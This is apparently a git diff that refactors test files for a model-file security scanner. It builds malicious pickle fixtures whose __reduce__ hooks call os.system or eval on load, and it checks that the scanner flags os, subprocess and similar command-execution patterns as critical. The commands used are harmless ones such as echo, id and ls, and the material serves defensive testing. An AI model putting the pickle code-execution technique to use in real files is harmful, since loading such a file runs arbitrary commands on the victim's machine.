test_get_model_extensions_does_not_import_scanners_package() -> None: """The model-extension helper should read leaf metadata without importing scanners.""" - result = subprocess.run( - [ - sys.executable, - "-c", - ( - "import sys; " - "from modelaudit.utils.model_extensions import get_all_scannable_extensions; " - "get_all_scannable_extensions(); " - "print('modelaudit.scanners' in sys.modules)" - ), - ], - capture_output=True, - check=True, - text=True, + _assert_scanners_absent_in_subprocess( + "import sys; " + "from modelaudit.utils.model_extensions import get_all_scannable_extensions; " + "get_all_scannable_extensions(); " + "print('modelaudit.scanners' in sys.modules)" ) - assert result.stdout.strip() == "False" - def test_gguf_repo_file_filtering(): """Test that GGUF repos download all scannable files.""" diff --git a/tests/test_lazy_loading.py b/tests/test_lazy_loading.py index b26131a50..6e9adc3a5 100644 --- a/tests/test_lazy_loading.py +++ b/tests/test_lazy_loading.py @@ -3,7 +3,6 @@ """ import pickle -import subprocess import sys import tempfile from pathlib import Path @@ -13,6 +12,7 @@ from modelaudit.scanners import ScannerRegistry, _registry from modelaudit.scanners.base import BaseScanner +from tests.helpers.processes import assert_scanners_absent_in_subprocess as _assert_scanners_absent_in_subprocess class TestScannerRegistry: @@ -296,19 +296,10 @@ def test_registry_metadata_drives_lazy_scanner_exports(self) -> None: def test_telemetry_import_does_not_load_scanners_package() -> None: """Importing telemetry should not pull in the scanner package through __version__.""" - result = subprocess.run( - [ - sys.executable, - "-c", - "import sys, modelaudit.telemetry; print('modelaudit.scanners' in sys.modules)", - ], - capture_output=True, - check=True, - text=True, + _assert_scanners_absent_in_subprocess( + "import sys, modelaudit.telemetry; print('modelaudit.scanners' in sys.modules)" ) - assert result.stdout.strip() == "False" - class TestPerformanceCharacteristics: """Test performance characteristics of lazy loading.""" diff --git a/tests/test_nightly_prerequisites.py b/tests/test_nightly_prerequisites.py index 79e417f10..8ef8329ff 100644 --- a/tests/test_nightly_prerequisites.py +++ b/tests/test_nightly_prerequisites.py @@ -19,7 +19,7 @@ _is_legitimate_serialization_file, _joblib_numpy_array_validated_raw_span_control_references, ) -from tests.helpers.file_creators import create_malicious_pickle, create_safe_pickle +from tests.helpers.file_creators import SystemCommandPayload, create_malicious_pickle, create_safe_pickle def _create_safe_pickle_payload() -> bytes: @@ -27,11 +27,7 @@ def _create_safe_pickle_payload() -> bytes: def _create_malicious_pickle_payload() -> bytes: - class MaliciousReduce: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os.system, ("echo benchmark",)) - - return pickle.dumps(MaliciousReduce(), protocol=4) + return pickle.dumps(SystemCommandPayload("echo benchmark", lambda: os.system), protocol=4) def test_nightly_inputs_are_complete_and_security_positive(tmp_path: Path) -> None: diff --git a/tests/test_os_subprocess_detection.py b/tests/test_os_subprocess_detection.py index 633924644..94c2809e0 100644 --- a/tests/test_os_subprocess_detection.py +++ b/tests/test_os_subprocess_detection.py @@ -1,9 +1,10 @@ """Test detection of os and subprocess patterns for command execution.""" import pickle +from pathlib import Path from modelaudit.core import scan_file -from modelaudit.scanners.base import IssueSeverity +from modelaudit.scanners.base import IssueSeverity, ScanResult def create_test_pickle(code_str: str) -> bytes: @@ -20,12 +21,7 @@ def test_detect_os_system(self, tmp_path): """Test detection of os.system command.""" # Create pickle with os.system malicious_code = "import os; os.system('echo pwned')" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "os_system.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "os_system.pkl") # Should detect os.system as CRITICAL assert any( @@ -36,12 +32,7 @@ def test_detect_os_popen(self, tmp_path): """Test detection of os.popen command.""" # Create pickle with os.popen malicious_code = "import os; os.popen('ls -la').read()" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "os_popen.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "os_popen.pkl") # Should detect os.popen as CRITICAL assert any( @@ -52,12 +43,7 @@ def test_detect_os_spawn(self, tmp_path): """Test detection of os.spawn* variants.""" # Create pickle with os.spawnv malicious_code = "import os; os.spawnv(os.P_WAIT, '/bin/echo', ['echo', 'pwned'])" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "os_spawn.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "os_spawn.pkl") # Should detect os.spawn as CRITICAL assert any( @@ -72,12 +58,7 @@ def test_detect_subprocess_call(self, tmp_path): """Test detection of subprocess.call.""" # Create pickle with subprocess.call malicious_code = "import subprocess; subprocess.call(['echo', 'pwned'])" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "subprocess_call.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "subprocess_call.pkl") # Should detect subprocess.call as CRITICAL assert any( @@ -89,12 +70,7 @@ def test_detect_subprocess_run(self, tmp_path): """Test detection of subprocess.run.""" # Create pickle with subprocess.run malicious_code = "import subprocess; subprocess.run(['ls', '-la'])" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "subprocess_run.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "subprocess_run.pkl") # Should detect subprocess.run as CRITICAL assert any( @@ -106,12 +82,7 @@ def test_detect_subprocess_popen(self, tmp_path): """Test detection of subprocess.Popen.""" # Create pickle with subprocess.Popen malicious_code = "import subprocess; p = subprocess.Popen(['echo', 'pwned'])" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "subprocess_popen.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "subprocess_popen.pkl") # Should detect subprocess.Popen as CRITICAL assert any( @@ -127,12 +98,7 @@ def test_detect_commands_getoutput(self, tmp_path): """Test detection of commands.getoutput.""" # Create pickle with commands.getoutput malicious_code = "import commands; output = commands.getoutput('ls -la')" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "commands_getoutput.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "commands_getoutput.pkl") # Should detect commands or getoutput as CRITICAL assert any( @@ -145,12 +111,7 @@ def test_detect_commands_getstatusoutput(self, tmp_path): """Test detection of commands.getstatusoutput.""" # Create pickle with commands.getstatusoutput malicious_code = "import commands; status, output = commands.getstatusoutput('whoami')" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "commands_getstatusoutput.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "commands_getstatusoutput.pkl") # Should detect commands or getstatusoutput as CRITICAL assert any( @@ -167,12 +128,7 @@ def test_detect_posix_system(self, tmp_path): """Test detection of posix.system (equivalent to os.system on Unix).""" # Create pickle with posix.system reference malicious_code = "import posix; posix.system('echo pwned')" - pickle_data = create_test_pickle(malicious_code) - - test_file = tmp_path / "posix_system.pkl" - test_file.write_bytes(pickle_data) - - result = scan_file(str(test_file)) + result = _scan_embedded_code(tmp_path, malicious_code, "posix_system.pkl") # Should detect posix as CRITICAL assert any( @@ -225,3 +181,10 @@ def test_detect_indirect_import(self, tmp_path): assert any( ("import" in issue.message.lower() or "system" in issue.message.lower()) for issue in result.issues ), f"Failed to detect dangerous patterns. Issues: {[i.message for i in result.issues]}" + + +def _scan_embedded_code(tmp_path: Path, malicious_code: str, filename: str) -> ScanResult: + pickle_data = create_test_pickle(malicious_code) + test_file = tmp_path / filename + test_file.write_bytes(pickle_data) + return scan_file(str(test_file)) diff --git a/tests/test_pickle_context_filtering.py b/tests/test_pickle_context_filtering.py index 3f96bd698..f74fd057a 100644 --- a/tests/test_pickle_context_filtering.py +++ b/tests/test_pickle_context_filtering.py @@ -9,6 +9,7 @@ from modelaudit.scanners.base import IssueSeverity from modelaudit.scanners.pickle_scanner import PickleScanner +from tests.helpers.file_creators import SystemCommandPayload class SafeStateDict: @@ -16,11 +17,6 @@ def __reduce__(self) -> tuple[Any, tuple[list[tuple[str, str]]]]: return (OrderedDict, ([("layer.weight", "tensor_data"), ("layer.bias", "bias_data")],)) -class MaliciousPayload: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os.system, ("id",)) - - def _short_binunicode(value: bytes) -> bytes: return b"\x8c" + bytes([len(value)]) + value @@ -31,7 +27,7 @@ def _alternate_platform_system_payload() -> tuple[bytes, str]: payload = pickle.dumps( { "state_dict": OrderedDict([("layer.weight", "tensor_data")]), - "payload": MaliciousPayload(), + "payload": SystemCommandPayload("id", lambda: os.system), }, protocol=4, ) @@ -55,7 +51,7 @@ def test_rust_pickle_scanner_does_not_let_ml_context_hide_dangerous_reduce(tmp_p path = tmp_path / "mixed.pkl" payload = { "state_dict": OrderedDict([("layer.weight", "tensor_data")]), - "payload": MaliciousPayload(), + "payload": SystemCommandPayload("id", lambda: os.system), } path.write_bytes(pickle.dumps(payload, protocol=4)) diff --git a/tests/test_pytorch_zip_detection.py b/tests/test_pytorch_zip_detection.py index 7d47b1aae..a7823513d 100644 --- a/tests/test_pytorch_zip_detection.py +++ b/tests/test_pytorch_zip_detection.py @@ -16,13 +16,7 @@ from modelaudit.scanners.base import IssueSeverity from modelaudit.utils.file.detection import detect_file_format from tests.helpers import write_mock_pytorch_zip_metadata - - -class _MaliciousPicklePayload: - def __reduce__(self): - import os - - return (os.system, ("echo pwned",)) +from tests.helpers.file_creators import SystemCommandPayload @pytest.fixture @@ -77,7 +71,7 @@ def test_scan_malicious_bin_file(self, tmp_path): # PyTorch models typically have data.pkl in archive/ directory write_mock_pytorch_zip_metadata(zf, prefix="archive") pickle_data = io.BytesIO() - pickle.dump({"model": _MaliciousPicklePayload()}, pickle_data) + pickle.dump({"model": SystemCommandPayload("echo pwned")}, pickle_data) zf.writestr("archive/data.pkl", pickle_data.getvalue()) # Scan the file @@ -290,14 +284,9 @@ def test_scan_malicious_zip_pkl(self, tmp_path: Path) -> None: zf.writestr("byteorder", "little") # Create a malicious pickle payload - class MaliciousClass: - def __reduce__(self): - import os - - return (os.system, ("echo pwned",)) pickle_data = io.BytesIO() - pickle.dump({"model": MaliciousClass()}, pickle_data) + pickle.dump({"model": SystemCommandPayload("echo pwned")}, pickle_data) zf.writestr("data.pkl", pickle_data.getvalue()) # Scan the file @@ -313,15 +302,8 @@ def test_scan_generic_zip_pkl_without_pytorch_metadata_uses_zip_scanner(self, tm """Generic .pkl ZIPs should remain on the ZIP scanner without PyTorch markers.""" pkl_file = tmp_path / "generic_model.pkl" with zipfile.ZipFile(pkl_file, "w") as zf: - - class MaliciousClass: - def __reduce__(self): - import os - - return (os.system, ("echo pwned",)) - pickle_data = io.BytesIO() - pickle.dump({"model": MaliciousClass()}, pickle_data) + pickle.dump({"model": SystemCommandPayload("echo pwned")}, pickle_data) zf.writestr("data.pkl", pickle_data.getvalue()) result = scan_file(str(pkl_file)) diff --git a/tests/test_regular_scan_hash.py b/tests/test_regular_scan_hash.py index e560cd5e9..7e2fd4d7a 100644 --- a/tests/test_regular_scan_hash.py +++ b/tests/test_regular_scan_hash.py @@ -8,6 +8,7 @@ import tarfile import zipfile from collections.abc import Callable, Iterator +from functools import partial from pathlib import Path from types import TracebackType from typing import Any, BinaryIO, cast @@ -22,11 +23,13 @@ from modelaudit.scanner_results import MAX_MEMBER_FILE_HASH_RECORDS from modelaudit.utils.helpers.secure_hasher import compute_aggregate_hash from tests.helpers import create_mock_pytorch_zip, write_mock_pytorch_zip_metadata +from tests.helpers.file_creators import EvalPayload +from tests.helpers.file_creators import ( + pickle_binunicode as _binunicode, +) +from tests.helpers.scanners import fail_onnx_bounded_discovery as fail_bounded_discovery - -class _MaliciousPicklePayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (eval, ("__import__('os').system('echo modelaudit-test')",)) +_MaliciousPicklePayload = partial(EvalPayload, ("__import__('os').system('echo modelaudit-test')",)) def _pytorch_zip_with_pickle_members( @@ -65,10 +68,6 @@ def _single_member_record(metadata: dict[str, Any], path_segments: list[str]) -> _PYTORCH_LEGACY_PROTOCOL_VERSION = 1001 -def _binunicode(value: bytes) -> bytes: - return b"X" + len(value).to_bytes(4, "little") + value - - def _legacy_pytorch_object_stream( storage_keys: tuple[str, ...], storage_size: int, @@ -848,26 +847,13 @@ def test_hash_files_by_path_defers_oversized_pytorch_zip_read_limit( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch ) -> None: """Aggregate hashing must not full-read oversized ZIP-backed PyTorch containers.""" - from modelaudit import core - - zip_path = create_mock_pytorch_zip(tmp_path / "large.pt") - with zip_path.open("ab") as handle: - handle.write(b"A" * 2048) - - def fail_hash(path: str) -> str: - if path == str(zip_path): - pytest.fail("oversized PyTorch ZIP was content-hashed before bounded scan dispatch") - return "a" * 64 - - monkeypatch.setattr(core, "_calculate_file_hash", fail_hash) - - content_hashes = core._hash_files_by_path( - [str(zip_path)], - config={"max_file_read_size": 64}, + _assert_pytorch_zip_hash_deferral( + tmp_path, + monkeypatch, + ("large.pt"), + ("oversized PyTorch ZIP was content-hashed before bounded scan dispatch"), ) - assert content_hashes[str(zip_path)].startswith("unhashable_pytorch_zip_read_limit_") - def test_hash_files_by_path_defers_file_backed_onnx( self, tmp_path: Path, @@ -1022,26 +1008,13 @@ def test_hash_files_by_path_defers_oversized_pytorch_zip_ckpt_read_limit( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch ) -> None: """All PyTorchZipScanner suffixes should use bounded ZIP hash deferral.""" - from modelaudit import core - - zip_path = create_mock_pytorch_zip(tmp_path / "large.ckpt") - with zip_path.open("ab") as handle: - handle.write(b"A" * 2048) - - def fail_hash(path: str) -> str: - if path == str(zip_path): - pytest.fail("oversized PyTorch ZIP .ckpt was content-hashed before bounded scan dispatch") - return "a" * 64 - - monkeypatch.setattr(core, "_calculate_file_hash", fail_hash) - - content_hashes = core._hash_files_by_path( - [str(zip_path)], - config={"max_file_read_size": 64}, + _assert_pytorch_zip_hash_deferral( + tmp_path, + monkeypatch, + ("large.ckpt"), + ("oversized PyTorch ZIP .ckpt was content-hashed before bounded scan dispatch"), ) - assert content_hashes[str(zip_path)].startswith("unhashable_pytorch_zip_read_limit_") - @pytest.mark.parametrize("read_size", [None, "invalid", -1]) def test_hash_files_by_path_uses_default_for_invalid_pytorch_read_limit( self, tmp_path: Path, monkeypatch: pytest.MonkeyPatch, read_size: object @@ -1553,12 +1526,6 @@ def test_directory_hash_is_deferred_when_onnx_sidecar_discovery_is_incomplete( ) _skip_path_during_directory_prefilter(monkeypatch, sidecar) - def fail_bounded_discovery(*_args: Any, **_kwargs: Any) -> Any: - raise onnx_scanner._OnnxStructureParseError( - "retained_object_limit_exceeded", - "bounded discovery exhausted its retained-object budget", - ) - monkeypatch.setattr(onnx_scanner, "_load_onnx_structure_file_backed", fail_bounded_discovery) result = scan_model_directory_or_file( @@ -1720,3 +1687,27 @@ def track_hash(file_path: str, *, deadline: float | None = None) -> str: assert result.bytes_scanned == model_path.stat().st_size + sidecar.stat().st_size assert result.content_hash is None assert determine_exit_code(result) == 2 + + +def _assert_pytorch_zip_hash_deferral( + tmp_path: Path, monkeypatch: pytest.MonkeyPatch, case_filename: str, case_failure_message: str +) -> None: + from modelaudit import core + + zip_path = create_mock_pytorch_zip(tmp_path / case_filename) + with zip_path.open("ab") as handle: + handle.write(b"A" * 2048) + + def fail_hash(path: str) -> str: + if path == str(zip_path): + pytest.fail(case_failure_message) + return "a" * 64 + + monkeypatch.setattr(core, "_calculate_file_hash", fail_hash) + + content_hashes = core._hash_files_by_path( + [str(zip_path)], + config={"max_file_read_size": 64}, + ) + + assert content_hashes[str(zip_path)].startswith("unhashable_pytorch_zip_read_limit_") diff --git a/tests/test_scanner_selection.py b/tests/test_scanner_selection.py index 5ddf24490..505103b48 100644 --- a/tests/test_scanner_selection.py +++ b/tests/test_scanner_selection.py @@ -45,16 +45,13 @@ create_mock_pytorch_zip, prefix_mock_onnx_with_unknown_field, ) +from tests.helpers.file_creators import SystemCommandPayload def _build_malicious_pickle() -> bytes: """Build a deterministic pickle payload with an unsafe reducer target.""" - class DangerousPayload: - def __reduce__(self) -> tuple[Any, tuple[str]]: - return (os.system, ("echo scanner-selection-test",)) - - return pickle.dumps(DangerousPayload()) + return pickle.dumps(SystemCommandPayload("echo scanner-selection-test", lambda: os.system)) def _build_malicious_skops_schema() -> bytes: diff --git a/tests/test_streaming_scan.py b/tests/test_streaming_scan.py index c7a30c371..cdc8c6e46 100644 --- a/tests/test_streaming_scan.py +++ b/tests/test_streaming_scan.py @@ -15,6 +15,7 @@ import zipfile from collections.abc import Iterator from contextlib import ExitStack +from functools import partial from pathlib import Path from typing import Any, cast from unittest.mock import patch @@ -43,11 +44,35 @@ from modelaudit.utils.helpers.secure_hasher import compute_aggregate_hash from modelaudit.utils.sources.huggingface import download_model_streaming from tests.helpers import create_malicious_pickle, create_mock_pytorch_zip, write_mock_pytorch_zip_metadata +from tests.helpers.file_creators import ( + EvalPayload, + build_external_onnx_payload, + download_onnx_fixture, + download_onnx_only_fixture, + write_hf_cachedir_tag, + write_hf_download_metadata, +) +from tests.helpers.file_creators import ( + write_ordered_hf_tokenizer_json as _write_ordered_hf_tokenizer_json, +) +from tests.helpers.scanners import fail_onnx_bounded_discovery as fail_bounded_discovery + + +def _file_generator(files: list[Path]) -> Iterator[tuple[Path, bool]]: + """Yield each path with whether it is the last file.""" + for i, file_path in enumerate(files): + is_last = i == len(files) - 1 + yield (file_path, is_last) + + +def _tracked_file_generator(path: Path, closed: list[bool]) -> Iterator[tuple[Path, bool]]: + try: + yield (path, True) + finally: + closed[0] = True -class _StreamingMaliciousPicklePayload: - def __reduce__(self) -> tuple[object, tuple[str]]: - return (eval, ("__import__('os').system('echo modelaudit-stream-test')",)) +_StreamingMaliciousPicklePayload = partial(EvalPayload, ("__import__('os').system('echo modelaudit-stream-test')",)) def _create_streaming_pytorch_zip(path: Path, members: dict[str, bytes]) -> Path: @@ -96,26 +121,7 @@ def create_mock_scan_result(bytes_scanned: int = 1024, with_critical_issue: bool def create_external_onnx_payload(tmp_path: Path, external_path: str = "model.onnx_data") -> bytes: - onnx = pytest.importorskip("onnx") - from onnx import TensorProto, helper - from onnx.onnx_ml_pb2 import StringStringEntryProto - - tensor = helper.make_tensor("W", TensorProto.FLOAT, [1], vals=[1.0]) - tensor.data_location = onnx.TensorProto.EXTERNAL - entry = StringStringEntryProto() - entry.key = "location" - entry.value = external_path - tensor.external_data.append(entry) - graph = helper.make_graph( - [helper.make_node("Relu", ["input"], ["output"], name="relu")], - "streaming_external_data_graph", - [helper.make_tensor_value_info("input", TensorProto.FLOAT, [1])], - [helper.make_tensor_value_info("output", TensorProto.FLOAT, [1])], - initializer=[tensor], - ) - model_path = tmp_path / "fixture.onnx" - onnx.save(helper.make_model(graph), str(model_path)) - return model_path.read_bytes() + return build_external_onnx_payload(tmp_path, external_path, "streaming_external_data_graph") def assert_only_onnx_external_schema_validation_skipped(result: Any) -> None: @@ -131,25 +137,6 @@ def assert_only_onnx_external_schema_validation_skipped(result: Any) -> None: assert determine_exit_code(result) == 2 -def write_hf_download_metadata(path: Path) -> None: - path.parent.mkdir(parents=True, exist_ok=True) - path.write_text( - "c5ee24cb16019beea0893ab7796b1df96625c6b8\n821d1aa69520101d6e0737f78a042ae25b19e5c0\n1712656091.123\n", - encoding="utf-8", - ) - - -def write_hf_cachedir_tag(path: Path) -> None: - path.parent.mkdir(parents=True, exist_ok=True) - path.write_text( - "Signature: 8a477f597d28d172789f06886806bc55\n" - "# This file is a cache directory tag created by huggingface_hub.\n" - "# For information about cache directory tags, see:\n" - "#\thttps://bford.info/cachedir/\n", - encoding="utf-8", - ) - - def write_large_valid_userblock_keras_hdf5(path: Path) -> int: h5py = pytest.importorskip("h5py") userblock_size = 16 * 1024 * 1024 @@ -190,23 +177,6 @@ def create_mock_location_scan_result( return result -def _write_ordered_hf_tokenizer_json( - path: Path, - *, - late_fields: str = "", - padding_size: int = 0, -) -> Path: - padding = f',"padding":"{"x" * padding_size}"' if padding_size else "" - path.write_text( - ( - '{"version":"1.0","added_tokens":[],' - f'"model":{{"type":"BPE","vocab":{{"hello":0}},"merges":[]}}{padding}{late_fields}}}' - ), - encoding="utf-8", - ) - return path - - def test_scan_model_directory_or_file_streaming_path() -> None: """Ensure stream:// paths route to streaming analysis.""" stream_url = "s3://bucket/model.pkl" @@ -678,19 +648,13 @@ def test_streaming_signed_url_without_inner_scheme_fails_closed() -> None: def test_scan_model_streaming_basic(temp_test_files: list[Path]) -> None: """Test basic streaming scan functionality.""" - def file_generator() -> Iterator[tuple[Path, bool]]: - """Generator that yields (path, is_last) tuples.""" - for i, file_path in enumerate(temp_test_files): - is_last = i == len(temp_test_files) - 1 - yield (file_path, is_last) - with patch("modelaudit.core.scan_file") as mock_scan: # Mock scan_file to return scan results mock_scan.side_effect = [create_mock_scan_result(bytes_scanned=100) for _ in temp_test_files] # Run streaming scan (don't delete for this test) result = scan_model_streaming( - file_generator=file_generator(), + file_generator=_file_generator(temp_test_files), timeout=30, delete_after_scan=False, ) @@ -721,14 +685,7 @@ def test_scan_model_streaming_hf_onnx_external_data_sidecar_matches_local_direct payload = create_external_onnx_payload(tmp_path) sidecar_bytes = struct.pack("f", 1.0) - def download_side_effect(*, filename: str, local_dir: str | None = None, **_kwargs: object) -> str: - assert local_dir is not None - path = Path(local_dir) / filename - path.parent.mkdir(parents=True, exist_ok=True) - path.write_bytes(payload if filename == "onnx/model.onnx" else sidecar_bytes) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_onnx_fixture, payload, sidecar_bytes) generator = download_model_streaming( "https://huggingface.co/test/model", cache_dir=tmp_path / "cache", @@ -860,15 +817,7 @@ def test_scan_model_streaming_hf_onnx_missing_external_data_still_warns( """Missing declared sidecars should remain visible instead of being suppressed.""" payload = create_external_onnx_payload(tmp_path) - def download_side_effect(*, filename: str, local_dir: str | None = None, **_kwargs: object) -> str: - assert filename == "onnx/model.onnx" - assert local_dir is not None - path = Path(local_dir) / filename - path.parent.mkdir(parents=True, exist_ok=True) - path.write_bytes(payload) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_onnx_only_fixture, payload) generator = download_model_streaming( "https://huggingface.co/test/model", cache_dir=tmp_path / "cache", @@ -913,15 +862,7 @@ def test_scan_model_streaming_hf_onnx_escaping_external_data_remains_cve( """Escaping sidecars must not be downloaded and made to look safe.""" payload = create_external_onnx_payload(tmp_path, external_path="../secret.bin") - def download_side_effect(*, filename: str, local_dir: str | None = None, **_kwargs: object) -> str: - assert filename == "onnx/model.onnx" - assert local_dir is not None - path = Path(local_dir) / filename - path.parent.mkdir(parents=True, exist_ok=True) - path.write_bytes(payload) - return str(path) - - mock_hf_hub_download.side_effect = download_side_effect + mock_hf_hub_download.side_effect = partial(download_onnx_only_fixture, payload) generator = download_model_streaming( "https://huggingface.co/test/model", cache_dir=tmp_path / "cache", @@ -1002,52 +943,7 @@ def test_scan_model_directory_hf_cache_onnx_external_data_accepts_symlinked_cach requires_symlinks: None, ) -> None: """Configured HF cache roots reached through symlinks should still trust snapshot aliases.""" - real_hub = tmp_path / "real-hub" - link_hub = tmp_path / "link-hub" - real_hub.mkdir() - link_hub.symlink_to(real_hub, target_is_directory=True) - monkeypatch.setenv("HF_HUB_CACHE", str(link_hub)) - - cache_root = link_hub / "models--test--model" - blobs_dir = cache_root / "blobs" - snapshot_dir = cache_root / "snapshots" / ("a" * 40) / "onnx" - blobs_dir.mkdir(parents=True) - snapshot_dir.mkdir(parents=True) - - model_blob = blobs_dir / "model-blob" - sidecar_blob = blobs_dir / "sidecar-blob" - model_blob.write_bytes(create_external_onnx_payload(tmp_path)) - sidecar_blob.write_bytes(struct.pack("f", 1.0)) - (snapshot_dir / "model.onnx").symlink_to(os.path.relpath(model_blob, snapshot_dir)) - (snapshot_dir / "model.onnx_data").symlink_to(os.path.relpath(sidecar_blob, snapshot_dir)) - - result = scan_model_directory_or_file( - str(snapshot_dir), - cache_enabled=False, - scanners=["onnx"], - skip_file_types=False, - ) - - failed_external = [ - check - for check in result.checks - if check.name == "External Data Reference Check" and check.status.value == "failed" - ] - passed_external = [ - check - for check in result.checks - if check.name == "External Data Reference Check" - and check.status.value == "passed" - and check.details.get("file") == "model.onnx_data" - ] - symlink_traversal_checks = [ - check for check in result.checks if check.name == "CVE-2026-34447: External Data Symlink Traversal" - ] - - assert failed_external == [] - assert len(passed_external) == 1 - assert symlink_traversal_checks == [] - assert_only_onnx_external_schema_validation_skipped(result) + _assert_symlinked_hf_onnx_cache_root(tmp_path, monkeypatch, requires_symlinks, ("model.onnx")) def test_scan_model_directory_hf_cache_content_routed_onnx_external_data_accepts_symlinked_cache_root( @@ -1056,52 +952,7 @@ def test_scan_model_directory_hf_cache_content_routed_onnx_external_data_accepts requires_symlinks: None, ) -> None: """Extensionless ONNX aliases under symlinked HF cache roots should keep snapshot sidecar context.""" - real_hub = tmp_path / "real-hub" - link_hub = tmp_path / "link-hub" - real_hub.mkdir() - link_hub.symlink_to(real_hub, target_is_directory=True) - monkeypatch.setenv("HF_HUB_CACHE", str(link_hub)) - - cache_root = link_hub / "models--test--model" - blobs_dir = cache_root / "blobs" - snapshot_dir = cache_root / "snapshots" / ("a" * 40) / "onnx" - blobs_dir.mkdir(parents=True) - snapshot_dir.mkdir(parents=True) - - model_blob = blobs_dir / "model-blob" - sidecar_blob = blobs_dir / "sidecar-blob" - model_blob.write_bytes(create_external_onnx_payload(tmp_path)) - sidecar_blob.write_bytes(struct.pack("f", 1.0)) - (snapshot_dir / "renamed").symlink_to(os.path.relpath(model_blob, snapshot_dir)) - (snapshot_dir / "model.onnx_data").symlink_to(os.path.relpath(sidecar_blob, snapshot_dir)) - - result = scan_model_directory_or_file( - str(snapshot_dir), - cache_enabled=False, - scanners=["onnx"], - skip_file_types=False, - ) - - failed_external = [ - check - for check in result.checks - if check.name == "External Data Reference Check" and check.status.value == "failed" - ] - passed_external = [ - check - for check in result.checks - if check.name == "External Data Reference Check" - and check.status.value == "passed" - and check.details.get("file") == "model.onnx_data" - ] - symlink_traversal_checks = [ - check for check in result.checks if check.name == "CVE-2026-34447: External Data Symlink Traversal" - ] - - assert failed_external == [] - assert len(passed_external) == 1 - assert symlink_traversal_checks == [] - assert_only_onnx_external_schema_validation_skipped(result) + _assert_symlinked_hf_onnx_cache_root(tmp_path, monkeypatch, requires_symlinks, ("renamed")) def test_scan_model_directory_hf_cache_onnx_external_data_rejects_nested_cache_lookalike( @@ -2368,12 +2219,6 @@ def test_scan_model_streaming_defers_hash_when_onnx_sidecar_discovery_is_incompl model_path.write_bytes(create_external_onnx_payload(tmp_path)) sidecar_path.write_bytes(struct.pack("f", 1.0)) - def fail_bounded_discovery(*_args: Any, **_kwargs: Any) -> Any: - raise onnx_scanner._OnnxStructureParseError( - "retained_object_limit_exceeded", - "bounded discovery exhausted its retained-object budget", - ) - monkeypatch.setattr(onnx_scanner, "_load_onnx_structure_file_backed", fail_bounded_discovery) result = scan_model_streaming( @@ -3682,11 +3527,6 @@ def test_scan_model_streaming_hf_cache_onnx_external_data_rejects_nested_cache_l def test_scan_model_streaming_with_deletion(temp_test_files: list[Path]) -> None: """Test that files are deleted after scanning in streaming mode.""" - def file_generator() -> Iterator[tuple[Path, bool]]: - for i, file_path in enumerate(temp_test_files): - is_last = i == len(temp_test_files) - 1 - yield (file_path, is_last) - with patch("modelaudit.core.scan_file") as mock_scan: mock_scan.side_effect = [create_mock_scan_result(bytes_scanned=100) for _ in temp_test_files] @@ -3696,7 +3536,7 @@ def file_generator() -> Iterator[tuple[Path, bool]]: # Run streaming scan with deletion result = scan_model_streaming( - file_generator=file_generator(), + file_generator=_file_generator(temp_test_files), timeout=30, delete_after_scan=True, ) @@ -4346,7 +4186,7 @@ def empty_generator(): def test_scan_model_streaming_timeout_closes_generator_and_deletes_yielded_file(tmp_path: Path) -> None: streamed_file = tmp_path / "streamed.pkl" streamed_file.write_bytes(b"payload") - generator_closed = False + generator_closed = [False] clock_calls = 0 def fake_time() -> float: @@ -4354,14 +4194,7 @@ def fake_time() -> float: clock_calls += 1 return 0.0 if clock_calls == 1 else 1.0 - def file_generator() -> Iterator[tuple[Path, bool]]: - nonlocal generator_closed - try: - yield (streamed_file, True) - finally: - generator_closed = True - - retained_generator = file_generator() + retained_generator = _tracked_file_generator(streamed_file, generator_closed) with ( patch("modelaudit.core.time.time", side_effect=fake_time), patch("modelaudit.core.scan_file") as mock_scan, @@ -4374,7 +4207,7 @@ def file_generator() -> Iterator[tuple[Path, bool]]: assert result.has_errors is True assert result.success is False - assert generator_closed is True + assert generator_closed == [True] assert not streamed_file.exists() mock_scan.assert_not_called() @@ -4413,16 +4246,9 @@ def file_generator() -> Iterator[tuple[Path, bool]]: def test_scan_model_streaming_interruption_closes_generator_and_deletes_yielded_file(tmp_path: Path) -> None: streamed_file = tmp_path / "streamed.pkl" streamed_file.write_bytes(b"payload") - generator_closed = False + generator_closed = [False] - def file_generator() -> Iterator[tuple[Path, bool]]: - nonlocal generator_closed - try: - yield (streamed_file, True) - finally: - generator_closed = True - - retained_generator = file_generator() + retained_generator = _tracked_file_generator(streamed_file, generator_closed) with ( patch("modelaudit.core.check_interrupted", side_effect=KeyboardInterrupt("interrupted")), pytest.raises(KeyboardInterrupt, match="interrupted"), @@ -4432,7 +4258,7 @@ def file_generator() -> Iterator[tuple[Path, bool]]: delete_after_scan=True, ) - assert generator_closed is True + assert 